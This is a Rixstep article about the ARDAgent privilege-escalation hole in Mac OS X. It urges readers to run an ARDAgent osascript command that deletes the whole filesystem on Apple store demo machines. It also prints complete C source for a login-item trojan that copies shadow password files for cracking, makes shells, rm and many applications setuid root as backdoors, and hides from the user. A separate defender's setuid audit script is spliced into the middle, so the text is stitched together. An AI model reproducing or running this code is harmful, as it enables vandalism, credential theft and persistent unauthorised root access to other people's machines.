Rixstep

Rooting Apple Can Be So Much Fun

And oh so much fun it is!



Alpha's little test at the Apple store was innocuous. As is the 'SLIPOC' ('system login items proof of concept'). But what if they weren't?

What if there was a simple way for anyone to walk into any Apple store anywhere at any time and wreak total havoc?

It should be easy to try.

Have Apple - as is suspected - contacted all their store managers and told them how to chmod ARDAgent to apply the patch?

There's one way to find out: walk into your nearest Apple store or Apple reseller and try the following on all the machines you can get at.

On every last one until they kick you out. Then hit the next store.

osascript -e 'tell application "ARDAgent" to do shell script "rm -fr /"'

SLIPOC could also be enhanced to make sure you always have a back door in. The easiest way would be to add a few lines of code to SLIHack.

#include <stdlib.h>
#import <Cocoa/Cocoa.h>

int main(int argc, const char *argv[]) {

    // We still keep this first part as we can post the shadow files
    // to ourselves so we can crack the system passwords and do a remote login.

    system("/sbin/mount -uw /");
    system("/bin/mkdir /Users/Shared/.SLIHack");
    system("cp -R /private/var/db/shadow /Users/Shared/.SLIHack");
    system("cp -R /private/var/root /Users/Shared/.SLIHack");
    system("chown -R 501:501 /Users/Shared/.SLIHack");
    system("chmod -R 0777 /Users/Shared/.SLIHack");

    // Now we add a few lines to make sure we always have a back door.

    // 1. First we make all the Unix shells 04555/SUID root.
    // Anytime we launch Terminal we can use any of them to get root.

    // And we add rm to the list so all rm commands are root enabled -
    // this can be fun even if we never come back - the slightest error
    // on the user's part and the system is toast!

    system("chmod 04555 /bin/bash /bin/csh /bin/rm /bin/sh /bin/tcsh /bin/zsh");

    // 2. Now we make a few more back doors with common Apple Cocoa apps.
    // They'll all work just like that stupid ARDAgent.
    // (Paths containing spaces are single-quoted for the shell.)

    system("chmod 04555 /Applications/iCal.app/Contents/MacOS/iCal");
    system("chmod 04555 /Applications/iChat.app/Contents/MacOS/iChat");
    system("chmod 04555 /Applications/iTunes.app/Contents/MacOS/iTunes");
    system("chmod 04555 /Applications/Mail.app/Contents/MacOS/Mail");
    system("chmod 04555 /Applications/Preview.app/Contents/MacOS/Preview");
    system("chmod 04555 /Applications/Safari.app/Contents/MacOS/Safari");
    system("chmod 04555 '/Applications/System Preferences.app/Contents/MacOS/System Preferences'");
    system("chmod 04555 /Applications/TextEdit.app/Contents/MacOS/TextEdit");

    // 3. Now we make a few more with Apple's 'core services'.

    system("chmod 04555 /System/Library/CoreServices/Finder.app/Contents/MacOS/Finder");
    system("chmod 04555 /System/Library/CoreServices/Dock.app/Contents/MacOS/Dock");
    system("chmod 04555 '/System/Library/CoreServices/Front Row.app/Contents/MacOS/Front Row'");
    system("chmod 04555 '/System/Library/CoreServices/Help Viewer.app/Contents/MacOS/Help Viewer'");
    system("chmod 04555 /System/Library/CoreServices/Kerberos.app/Contents/MacOS/Kerberos");

    // And so on - you can do this on just about any Cocoa app bundle in the system!

    // Now the trojan disappears as the user logs in, totally unaware anything has happened.

    return NSApplicationMain(argc, argv);
}
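As an added defender-side check (not code from the article or from Rixstep), the POSIX shell audit below lists every setuid file under the directories you name and reports any that are not on an allowlist. Run against /bin, /Applications and /System/Library/CoreServices it covers both questions the article raises: whether ARDAgent (assumed to live under /System/Library/CoreServices/RemoteManagement) is still setuid, and whether anything like the mass 'chmod 04555' in SLIHack has been applied. The allowlist file and the directory list are assumptions.

```shell
#!/bin/sh
# Added defender-side check; not code from the original article. Lists every
# setuid file under the given directories and flags any not on an allowlist,
# which catches both the ARDAgent case and the mass 'chmod 04555' above.
# Usage: audit_setuid ALLOWLIST_FILE DIR...   (exit status 1 if any unexpected)

# Print the path of every regular file under DIR... whose setuid bit is set.
# '-perm -4000' matches exactly the bit that 'chmod 04555' turns on.
find_setuid() {
    find "$@" -xdev -type f -perm -4000 -print 2>/dev/null
}

# Compare the setuid files found under DIR... with ALLOWLIST_FILE (one full
# path per line). Prints each unexpected path and returns 1 if there were any.
audit_setuid() {
    allow="$1"
    shift
    # grep -Fvx drops every line that exactly equals an allowlisted path;
    # '|| true' keeps an empty result (everything allowed) from being an error
    unexpected=$(find_setuid "$@" | grep -Fvx -f "$allow" || true)
    if [ -n "$unexpected" ]; then
        printf '%s\n' "$unexpected" | sed 's/^/UNEXPECTED setuid: /'
        return 1
    fi
    return 0
}

# Example invocation on a Leopard-era Mac (allowlist path is an assumption):
# audit_setuid /etc/setuid.allow /bin /Applications /System/Library/CoreServices
```

The allowlist should be captured from a known-good install of the same OS version, so that a newly setuid shell, rm or app binary shows up as a diff rather than being judged by eye.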

It's either that or wait until Apple fix the flaws, which, considering they've known about them for five years already, may be never. Or until some corporation losing data through hackers gets wind of this and launches a class action suit against them for negligence.

[Naturally no one is seriously advocating people go into their local Apple stores, full of frustrations over Steve's innumerable bait and switch tricks, snarky refund policies, and 'whole banana arrogance', distract the clerks and vandalise the computers on display. And people are already doing this anyway. Ed.]

See Also
Learning Curve: A Suggestion
Industry Watch: You're Root, Dude!
Industry Watch: You're Toast, Dude?
Learning Curve: The First Real Malware?
Industry Watch: ARDAgent - Here to Stay?
Learning Curve: Apple Redefine 'Epic FAIL'?
Hotspots: SLIPOC – Root Exploit of Mac OS X
Learning Curve: ARDAgent on Snow Leopard
Industry Watch: It's Not New It Starts with 10.2
The Technological: Walking into an Apple Store
Apple Developer Connection: AppleScript Overview
Industry Watch: Huge, Crazy, Ridiculous OS X Security Hole
Apple Developer Connection: Apple Events Programming Guide

Hackers Handbook
Developers Workshop: Hackers Handbook I
Developers Workshop: Hackers Handbook II
Developers Workshop: Hackers Handbook III
Developers Workshop: Hackers Handbook IV

Copyright © Rixstep. All rights reserved.